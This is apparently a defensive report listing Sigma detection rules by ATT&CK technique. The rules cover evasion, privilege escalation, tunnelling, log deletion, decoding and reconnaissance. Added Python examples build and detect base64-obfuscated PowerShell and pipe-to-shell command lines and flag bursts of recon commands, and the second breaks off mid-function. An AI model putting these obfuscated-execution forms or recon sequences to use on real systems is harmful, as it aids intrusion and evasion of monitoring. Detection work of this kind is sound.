  • Windows Defender Exclusions Added - PowerShell - Level: medium
    Description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detects filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects a possible unload of the Sysmon filter driver via fltmc.exe
  • HackTool - EDRSilencer Execution - Level: high
    Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
  • Windows Firewall Disabled via PowerShell - Level: medium
    Description: Detects attempts to disable the Windows Firewall using PowerShell
  • Write Protect For Storage Disabled - Level: medium
    Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been observed being used by the cypherpunk group.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • ETW Logging Tamper In .NET Processes Via CommandLine - Level: high
    Description: Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • Removal Of Index Value to Hide Schedule Task - Registry - Level: medium
    Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides the task from tooling such as "schtasks /query"
  • Removal Of SD Value to Hide Schedule Task - Registry - Level: medium
    Description: Detects removal of the SD (Security Descriptor) value under the \Schedule\TaskCache\Tree registry key to hide a scheduled task. This technique is used by Tarrask malware
  • ETW Logging Disabled In .NET Processes - Sysmon Registry - Level: high
    Description: Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.
  • Hide Schedule Task Via Index Value Tamper - Level: high
    Description: Detects when the "index" value of a scheduled task is modified in the registry, which effectively hides the task from tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)
  • ETW Logging Disabled For rpcrt4.dll - Level: low
    Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
  • ETW Logging Disabled For SCM - Level: low
    Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
  • Diamond Sleet APT Scheduled Task Creation - Registry - Level: high
    Description: Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity vulnerability CVE-2023-42793
  • Terminate Linux Process Via Kill - Level: medium
    Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
attack.t1083 22
  • Powershell File and Directory Discovery - Level: low
    Description: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
  • Shell Invocation via Apt - Linux - Level: medium
    Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Capabilities Discovery - Linux - Level: low
    Description: Detects usage of the "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or similar.
  • File and Directory Discovery - Linux - Level: informational
    Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc. to discover files, directories and network shares.
  • Shell Execution via Find - Linux - Level: high
    Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
  • Shell Execution via Flock - Linux - Level: high
    Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Shell Execution GCC - Linux - Level: high
    Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Shell Execution via Nice - Linux - Level: high
    Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Potential Discovery Activity Using Find - Linux - Level: medium
    Description: Detects usage of "find" binary in a suspicious manner to perform discovery
  • Vim GTFOBin Abuse - Linux - Level: high
    Description: Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • File and Directory Discovery - MacOS - Level: informational
    Description: Detects usage of system utilities to discover files and directories
  • Potential Discovery Activity Using Find - MacOS - Level: medium
    Description: Detects usage of "find" binary in a suspicious manner to perform discovery
  • Cisco Discovery - Level: low
    Description: Detects discovery of information about network devices that is not stored in config files
  • Source Code Enumeration Detection by Keyword - Level: medium
    Description: Detects source code enumeration using GET requests with keyword searches in URL strings
  • Powershell Sensitive File Discovery - Level: medium
    Description: Detects adversaries enumerating sensitive files
  • Powershell Directory Enumeration - Level: medium
    Description: Detects technique used by MAZE ransomware to enumerate directories using Powershell
  • DirLister Execution - Level: low
    Description: Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker used to view and manipulate processes, kernel options and other low-level internals
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/recon tool Seatbelt via PE information or command line parameters
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.t1548 21
  • PrintNightmare Powershell Exploitation - Level: high
    Description: Detects Commandlet name for PrintNightmare exploitation.
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • CA Policy Removed by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.
  • CA Policy Updated by Non Approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes. Check whether the initiating actor is approved to make changes, then review the modified properties and compare the "old" and "new" values.
  • New CA Policy by Non-approved Actor - Level: medium
    Description: Monitor and alert on conditional access changes.
  • User Added To Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership additions of groups that have CA policy modification access
  • User Removed From Group With CA Policy Modification Access - Level: medium
    Description: Monitor and alert on group membership removal of groups that have CA policy modification access
  • GCP Break-glass Container Workload Deployed - Level: medium
    Description: Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
  • Linux Capabilities Discovery - Level: low
    Description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
  • Linux Doas Conf File Creation - Level: medium
    Description: Detects the creation of the doas.conf file on a Linux host.
  • Linux Doas Tool Execution - Level: low
    Description: Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.
  • SCM Database Privileged Operation - Level: medium
    Description: Detects non-system users performing privileged operations on the SCM database
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP - Level: high
    Description: Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
  • Vulnerable Netlogon Secure Channel Connection Allowed - Level: high
    Description: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
  • Credential Dumping Attempt Via Svchost - Level: high
    Description: Detects when a process tries to access the memory of svchost to potentially dump credentials.
  • Regedit as Trusted Installer - Level: high
    Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
  • Abused Debug Privilege by Arbitrary Parent Processes - Level: high
    Description: Detection of unusual child processes by different system processes
  • UAC Bypass via Windows Firewall Snap-In Hijack - Level: medium
    Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
  • COM Hijack via Sdclt - Level: high
    Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
attack.t1090 21
  • OpenCanary - HTTPPROXY Login Attempt - Level: high
    Description: Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
  • Malicious IP Address Sign-In Failure Rate - Level: high
    Description: Indicates sign-in from a malicious IP address based on high failure rates.
  • Malicious IP Address Sign-In Suspicious - Level: high
    Description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.
  • Sign-In From Malware Infected IP - Level: high
    Description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Connection Proxy - Level: low
    Description: Detects setting proxy configuration
  • Ngrok Usage with Remote Desktop Service - Level: high
    Description: Detects cases in which ngrok, a reverse proxy tool, forwards traffic to the local RDP port, which could be a sign of malicious behaviour
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
  • Suspicious TCP Tunnel Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that create sockets/listeners, which could be indicative of tunneling activity
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • HackTool - Htran/NATBypass Execution - Level: high
    Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
  • New Port Forwarding Rule Added Via Netsh.EXE - Level: medium
    Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
  • RDP Port Forwarding Rule Added Via Netsh.EXE - Level: high
    Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
  • PUA - Fast Reverse Proxy (FRP) Execution - Level: high
    Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
  • PUA - IOX Tunneling Tool Execution - Level: high
    Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
  • PUA - NPS Tunneling Tool Execution - Level: high
    Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
  • Potentially Suspicious Usage Of Qemu - Level: medium
    Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
  • New PortProxy Registry Entry Added - Level: medium
    Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
attack.t1070 20
  • Suspicious Load of Advapi31.dll - Level: informational
    Description: Detects the load of advapi31.dll by a process running in an uncommon folder
  • Kubernetes Events Deleted - Level: medium
    Description: Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.
  • SES Identity Has Been Deleted - Level: medium
    Description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
  • Linux Package Uninstall - Level: low
    Description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
  • Remove Exported Mailbox from Exchange Webserver - Level: high
    Description: Detects removal of an exported Exchange mailbox, which could be an attempt to cover the tracks of a ProxyShell exploit
  • EventLog EVTX File Deleted - Level: medium
    Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
  • Exchange PowerShell Cmdlet History Deleted - Level: high
    Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
  • IIS WebServer Access Logs Deleted - Level: medium
    Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
  • PowerShell Console History Logs Deleted - Level: medium
    Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
  • Tomcat WebServer Logs Deleted - Level: medium
    Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
  • DLL Load By System Process From Suspicious Locations - Level: medium
    Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
  • Clearing Windows Console History - Level: high
    Description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE - Level: medium
    Description: Detects potential malicious and unauthorized usage of bcdedit.exe
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detects filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects a possible unload of the Sysmon filter driver via fltmc.exe
  • Fsutil Suspicious Invocation - Level: high
    Description: Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during an attack (seen with NotPetya and others).
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
  • Shadow Copies Deletion Using Operating Systems Utilities - Level: high
    Description: Detects shadow copy deletion using operating system utilities
  • Terminal Server Client Connection History Cleared - Registry - Level: high
    Description: Detects the deletion of registry keys containing the MSTSC connection history
attack.t1140 20
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands like 'decode', which is sometimes used to decode malicious code
  • Suspicious Inbox Forwarding Identity Protection - Level: high
    Description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
  • Suspicious Inbox Manipulation Rules - Level: high
    Description: Detects when suspicious rules that delete or move messages or folders are set on a user's inbox.
  • Linux Base64 Encoded Pipe to Shell - Level: medium
    Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
  • Linux Base64 Encoded Shebang In CLI - Level: medium
    Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
  • Linux Shell Pipe to Shell - Level: medium
    Description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Potential Base64 Decoded From Images - Level: high
    Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
  • PowerShell Decompress Commands - Level: informational
    Description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
  • Ping Hex IP - Level: high
    Description: Detects a ping command that uses a hex encoded IP address
  • PowerShell Base64 Encoded FromBase64String Cmdlet - Level: high
    Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects the presence of a potentially XOR-encoded PowerShell command
  • Potential Commandline Obfuscation Using Escape Characters - Level: medium
    Description: Detects potential commandline obfuscation using known escape characters
  • DNS-over-HTTPS Enabled by Registry - Level: medium
    Description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, the organization loses visibility into data such as query type, response and originating IP that are used to identify bad actors.
  • Potential BlackByte Ransomware Activity - Level: high
    Description: Detects command line patterns used by BlackByte ransomware in different operations
  • UNC4841 - SSL Certificate Exfiltration Via Openssl - Level: high
    Description: Detects the execution of "openssl" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget - Level: high
    Description: Detects execution of "wget" to download ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero-day exploitation.
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget - Level: high
    Description: Detects execution of "wget" to download a "tar" file from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero-day exploitation.
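The base64 rules listed above (Linux Base64 Encoded Shebang In CLI, PowerShell Base64 Encoded FromBase64String Cmdlet) rely on a property of base64 that is easier to see in code than in a rule file: a keyword's encoding depends on its byte offset modulo 3, so a detection has to carry one fragment per alignment, and for PowerShell -EncodedCommand the plaintext is UTF-16LE rather than UTF-8. The Python below is an added example written for this report, not code from the Sigma project; the command lines it scans are constructed and the keyword list is an illustrative assumption.

```python
"""Added example: matching a keyword hidden inside base64 at any alignment.

Not part of the SigmaTACT report or the Sigma rules it summarises; sample
command lines are constructed for the example.
"""
import base64

# Leading base64 characters that also depend on the filler bytes placed
# before the keyword, per alignment offset (0, 1 or 2 bytes of filler).
_LEAD_UNSTABLE = {0: 0, 1: 2, 2: 3}
# Trailing characters (including '=' padding) that also depend on whatever
# follows the keyword, keyed by (offset + len(keyword_bytes)) % 3.
_TAIL_UNSTABLE = {0: 0, 1: 3, 2: 2}


def b64_fragments(keyword, encoding="utf-8"):
    """Return the alignment-independent base64 fragments of keyword.

    Base64 maps 3 bytes to 4 characters, so the same bytes encode to
    different text depending on where they start. Prefixing 0, 1 or 2
    filler bytes and trimming the characters influenced by the filler or
    by the unknown bytes after the keyword leaves fragments that appear
    verbatim in the encoding of any plaintext containing the keyword.
    """
    raw = keyword.encode(encoding)
    frags = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode("ascii")
        start = _LEAD_UNSTABLE[offset]
        end = len(enc) - _TAIL_UNSTABLE[(offset + len(raw)) % 3]
        frag = enc[start:end]
        if frag:  # a 1-byte keyword at offset 2 yields nothing stable
            frags.append(frag)
    return frags


def find_encoded_keywords(cmdline, keywords, encodings=("utf-8", "utf-16-le")):
    """Return (keyword, encoding) pairs found base64-encoded in cmdline.

    utf-8 covers `echo <b64> | base64 -d | sh`; utf-16-le covers PowerShell
    -EncodedCommand, which base64-encodes UTF-16LE text.
    """
    hits = set()
    for kw in keywords:
        for enc in encodings:
            if any(frag in cmdline for frag in b64_fragments(kw, enc)):
                hits.add((kw, enc))
    return sorted(hits)


# Illustrative keyword list (an assumption for the example).
KEYWORDS = ["#!/bin/", "FromBase64String", "Invoke-Expression", "DownloadString"]


def ps_encoded(script):
    """Build a PowerShell -EncodedCommand line the way attackers do."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -enc {blob}"


def sh_encoded(script):
    """Build a Linux base64-pipe-to-shell one-liner."""
    blob = base64.b64encode(script.encode("utf-8")).decode("ascii")
    return f"echo {blob} | base64 -d | bash"


# Constructed sample command lines; the "payloads" are harmless strings.
SAMPLES = {
    "ps_b64": ps_encoded("$p=[Convert]::FromBase64String('aGk=');IEX $p"),
    "sh_b64": sh_encoded("#!/bin/bash\necho hello from the dropper\n"),
    "benign": "powershell.exe -File C:\\Scripts\\Backup.ps1",
}


def scan(samples=SAMPLES):
    """Run the detector over every sample and return {name: hits}."""
    return {name: find_encoded_keywords(cl, KEYWORDS) for name, cl in samples.items()}


if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:7} -> {hits or 'clean'}")
```

Keep the keywords long: a three-byte keyword produces fragments of three or four characters, which will match random base64 somewhere in any large blob. The empty-fragment guard matters for the same reason, since an empty string is a substring of everything.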
attack.t1127 19
  • Remote Thread Creation Ttdinject.exe Proxy - Level: high
    Description: Detects a remote thread creation of Ttdinject.exe used as proxy
  • AspNetCompiler Execution - Level: medium
    Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
  • Suspicious Child Process of AspNetCompiler - Level: high
    Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler - Level: high
    Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • Suspicious Use of CSharp Interactive Console - Level: high
    Description: Detects the execution of CSharp interactive console by PowerShell
  • C# IL Code Compilation Via Ilasm.EXE - Level: medium
    Description: Detects the use of "Ilasm.EXE" to compile .NET intermediate language (IL) code into an EXE or DLL.
  • JScript Compiler Execution - Level: low
    Description: Detects the execution of "jsc.exe" (JScript Compiler). Attackers might abuse this to compile JScript files on the fly and bypass application whitelisting.
  • Kavremover Dropped Binary LOLBIN Usage - Level: high
    Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
  • Use of Remote.exe - Level: medium
    Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
  • Use of TTDInject.exe - Level: medium
    Description: Detects the execution of TTDInject.exe, which is used by Windows 10 v1809 and newer for Time Travel Debugging (the underlying call of tttracer.exe)
  • Use of VSIISExeLauncher.exe - Level: medium
    Description: The "VSIISExeLauncher.exe" binary, part of Visual Studio/VS Code, can be used to execute arbitrary binaries
  • Use of Wfc.exe - Level: medium
    Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
  • Potential Mftrace.EXE Abuse - Level: medium
    Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.
  • Detection of PowerShell Execution via Sqlps.exe - Level: medium
    Description: This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • SQL Client Tools PowerShell Session Detection - Level: medium
    Description: This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
  • Potential Arbitrary Code Execution Via Node.EXE - Level: high
    Description: Detects the execution of node.exe, which is shipped with multiple software products such as VMware and Adobe, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.
  • Node Process Executions - Level: medium
    Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
attack.t1482 18
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Trickbot Malware Reconnaissance Activity - Level: high
    Description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
  • Domain Trust Discovery - Level: medium
    Description: Detects a discovery of domain trusts.
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • DNS Server Discovery Via LDAP Query - Level: low
    Description: Detects DNS server discovery via LDAP query requests from uncommon applications
  • BloodHound Collection Files - Level: high
    Description: Detects default file names output by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Domain Trust Discovery Via Dsquery - Level: medium
    Description: Detects execution of "dsquery.exe" for domain trust discovery
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • HackTool - TruffleSnout Execution - Level: high
    Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • Potential Recon Activity Via Nltest.EXE - Level: medium
    Description: Detects nltest commands that can be used for information discovery
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
attack.t1087 18
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin Activity as Described by NCSC
  • SharpHound Recon Account Discovery - Level: high
    Description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership.
  • Hacktool Ruler - Level: high
    Description: Detects events that are generated when using the hacktool Ruler by SensePost
  • Uncommon Connection to Active Directory Web Services - Level: medium
    Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - SOAPHound Execution - Level: high
    Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - Seatbelt Execution - Level: high
    Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information or command line parameters
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions caused by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, including network, user info and domain groups. The Pikabot malware has been seen to use this technique as part of its C2 botnet registration, with a short collection time frame (less than 1 minute).
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
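Several rules in the attack.t1482 and attack.t1087 groups (Trickbot Malware Reconnaissance Activity, Potential Pikabot Discovery Activity, Reconnaissance Activity Using BuiltIn Commands) share one idea: individually low-value discovery commands become suspicious when a single host runs many different ones within a short window. The Python below is an added example written for this report, not Sigma code; it tags process command lines with the discovery primitive they represent and raises an alert when a host accumulates several distinct primitives inside a sliding window. The events, host names, window and threshold are constructed assumptions for the example.

```python
"""Added example: flagging a burst of discovery commands on one host.

Not part of the SigmaTACT report or the Sigma rules it summarises; the
process events, host names and thresholds below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery primitives and the command-line shapes that reveal them.
# Illustrative subset; the Sigma rules cover more commands than this.
RECON_PATTERNS = [
    ("whoami_all", re.compile(r"\bwhoami(?:\.exe)?\s+/all\b", re.I)),
    ("ipconfig_all", re.compile(r"\bipconfig(?:\.exe)?\s+/all\b", re.I)),
    ("net_group", re.compile(r"\bnet1?(?:\.exe)?\s+group\s+\"?domain admins", re.I)),
    ("net_user_domain", re.compile(r"\bnet1?(?:\.exe)?\s+user\b.*\s/domain\b", re.I)),
    ("nltest_dclist", re.compile(r"\bnltest(?:\.exe)?\s+/dclist", re.I)),
    ("nltest_trusts", re.compile(r"\bnltest(?:\.exe)?\s+/domain_trusts", re.I)),
    ("systeminfo", re.compile(r"\bsysteminfo(?:\.exe)?\b", re.I)),
]


def classify_recon(cmdline):
    """Return the set of discovery primitives a command line represents."""
    return {name for name, rx in RECON_PATTERNS if rx.search(cmdline)}


def detect_recon_bursts(events, window=timedelta(seconds=60), threshold=4):
    """Alert when one host runs >= threshold distinct primitives within window.

    events: iterable of (timestamp, host, cmdline).
    Returns [(host, burst_start, sorted primitive names)], one per host.
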